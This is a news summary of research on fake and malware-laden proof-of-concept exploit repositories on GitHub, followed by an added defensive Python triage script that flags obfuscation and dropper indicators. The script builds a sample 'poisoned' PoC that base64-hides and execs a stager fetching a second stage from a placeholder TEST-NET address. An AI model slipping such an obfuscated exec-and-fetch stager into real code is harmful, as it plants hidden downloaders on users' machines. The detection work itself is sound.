Fake Proof of Concept exploits for vulnerabilities, containing malware found on GitHub
Researchers at Leiden Institute of Advanced Computer Science find many fake proof-of-concept (PoC) exploits for vulnerabilities on GitHub, many of them including malware.
GitHub is a very well-known platform for hosting source code. Some repositories are intentionally made public, with the objective of sharing code and possibly also allowing other users to contribute their own.
The platform is also used by security researchers to publish their Proof of Concept (PoC) exploitation toolkits, with the intention of helping the security community verify the presence of vulnerabilities, determine the impact and scope of a flaw, and verify the effectiveness of remediation actions.
Researchers at Leiden Institute of Advanced Computer Science analyzed nearly 50,000 repositories that advertised an exploit for vulnerabilities and identified nearly 5,000 repositories that were either fake or stealthily delivering malicious code or scripts.
Interesting cases involved the presence of malicious tools, ranging from remote access backdoors, obfuscated Python scripts, JavaScript trojans and VBScripts to information stealers and even Cobalt Strike.
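The obfuscated Python scripts mentioned above typically hide a second stage behind a base64 literal that is decoded and passed to `exec`. The following added example (not from the article or from the Leiden study's tooling) is a defender-side static triage you can run over a downloaded PoC file before anyone executes it: it counts a handful of heuristic indicators, decodes long base64 literals to see whether they contain code or URLs, and returns a weighted verdict. The indicator patterns, weights and threshold are assumptions chosen for illustration, and both sample PoCs are constructed (the embedded host uses the TEST-NET range 203.0.113.0/24).

```python
"""Static triage of a 'proof of concept' script for dropper/obfuscation
indicators. Added example; heuristics are illustrative assumptions."""
import base64
import binascii
import re

# Heuristic indicators a reviewer would want flagged before running a PoC.
PATTERNS = {
    "exec_or_eval": re.compile(r"\b(exec|eval)\s*\("),
    "base64_decode": re.compile(r"b64decode|base64\.decode|frombase64"),
    "long_base64_literal": re.compile(r"[\"']([A-Za-z0-9+/]{80,}={0,2})[\"']"),
    "hex_escape_run": re.compile(r"(\\x[0-9a-fA-F]{2}){8,}"),
    "shell_spawn": re.compile(r"\b(subprocess|os\.system|os\.popen|Popen)\b"),
    "raw_ip_url": re.compile(r"https?://\d{1,3}(\.\d{1,3}){3}"),
}

# Assumed weights: a decoded payload that is itself code weighs the most.
WEIGHTS = {
    "exec_or_eval": 2,
    "base64_decode": 1,
    "long_base64_literal": 2,
    "hex_escape_run": 2,
    "shell_spawn": 1,
    "raw_ip_url": 2,
    "decoded_payload_suspicious": 4,
}
REVIEW_THRESHOLD = 5  # assumed cut-off for "send this to a human"


def _decoded_blob_suspicious(blob: str) -> bool:
    """Decode a base64 literal and check whether it hides code, a URL or a PE."""
    try:
        data = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return False
    if data.startswith(b"MZ"):  # Windows executable header
        return True
    text = data.decode("utf-8", errors="ignore").lower()
    return any(k in text for k in ("import ", "http://", "https://",
                                   "powershell", "/bin/sh"))


def triage(source: str) -> dict:
    """Return indicator counts, a weighted score and a verdict for one file."""
    hits = {name: len(rx.findall(source)) for name, rx in PATTERNS.items()}
    blobs = PATTERNS["long_base64_literal"].findall(source)
    hits["decoded_payload_suspicious"] = sum(
        1 for b in blobs if _decoded_blob_suspicious(b))
    # Each indicator contributes its weight once, regardless of hit count.
    score = sum(WEIGHTS[name] for name, count in hits.items() if count)
    verdict = "review" if score >= REVIEW_THRESHOLD else "likely-benign"
    return {"indicators": hits, "score": score, "verdict": verdict}


# Constructed sample 1: a plain PoC that only talks to the host given on argv.
BENIGN_POC = '''
import sys
import requests
target = sys.argv[1]
r = requests.get(f"http://{target}/status", timeout=5)
print(r.status_code)
'''

# Constructed sample 2: same shape, but the "PoC" decodes and runs a hidden
# stager that fetches a second stage from a TEST-NET address.
_STAGER = ("import os\nimport urllib.request\n"
           "urllib.request.urlopen('http://203.0.113.10/stage')\n")
_BLOB = base64.b64encode(_STAGER.encode()).decode()
POISONED_POC = f'''
import base64
exec(base64.b64decode("{_BLOB}"))
'''

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_POC), ("poisoned", POISONED_POC)):
        print(label, triage(src))
```

Run it on a cloned repository by feeding each `.py` file's contents to `triage()`; anything that reaches the review verdict should be read by a person in an isolated environment rather than executed on an analyst workstation. The regular expressions are deliberately simple, so expect false positives on legitimate tooling that shells out or embeds certificates; the point is to force a look before running, not to replace a sandbox.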
The Bleeping Computer article